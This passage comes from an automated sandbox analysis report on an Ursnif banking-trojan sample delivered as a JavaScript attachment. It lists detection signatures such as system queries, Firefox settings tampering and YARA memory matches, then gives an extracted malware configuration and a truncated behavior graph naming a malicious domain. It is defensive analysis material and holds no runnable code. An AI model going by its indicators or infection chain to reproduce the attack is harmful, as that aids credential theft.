Source: explorer.exe, 00000010.00000000.1117047191.0000000001170000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000011.00000000.1152895092.000001F26D790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000013.00000000.1164781219.000002DB88060000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1184426981.000001C7D3990000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: explorer.exe, 00000010.00000000.1115420949.0000000000A30000.00000004.00000020.sdmpBinary or memory string: Progman{
Source: explorer.exe, 00000010.00000000.1115420949.0000000000A30000.00000004.00000020.sdmpBinary or memory string: PProgmancci\Ap

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0513733B cpuid 3_2_0513733B
Queries the installation date of WindowsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Contains functionality to create pipes for IPCShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05134134 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,3_2_05134134
Contains functionality to query local / system timeShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0514CEA7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread,3_2_0514CEA7
Contains functionality to query the account / user nameShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0513476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_0513476B
Contains functionality to query windows versionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05137D9B GetVersion,LdrInitializeThunk,GetLastError,3_2_05137D9B
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Overwrites Mozilla Firefox settingsShow sources
Source: C:\Windows\explorer.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\prefs.js

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000003.00000003.974215448.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1010236467.0000000004F5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974824363.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974371336.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974507500.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974637108.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000003.1154798973.00000133741C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1156601270.0000000000C3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974737633.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974879691.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974931290.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 3720, type: MEMORY
Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5664, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4052, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\prefs.js

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000003.00000003.974215448.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1010236467.0000000004F5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974824363.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974371336.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974507500.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974637108.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000003.1154798973.00000133741C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1156601270.0000000000C3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974737633.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974879691.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974931290.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 3720, type: MEMORY
Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5664, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4052, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "292", "system": "3f177153870006aaa3a6cdc80cbbbd11hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1586199788", "user": "31b341dd54c8a3b79c4b2eb51b2eaed4", "hash": "0x0d8e127a", "soft": "3"}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 220434 Sample: view_attach_b8x.js Startdate: 06/04/2020 Architecture: WINDOWS Score: 100 58 vv.malorun.at 2->58 60 resolver1.opendns.com 2->60 70 Multi AV Scanner detection for domain / URL 2->70 72 Found malware configuration 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 7 other signatures 2->76 11 wscript.exe 3 2->11         started        13 iexplore.exe 5 432 2->13         started        signatures3 process4 process5 15 regsvr32.exe 11->15         started        17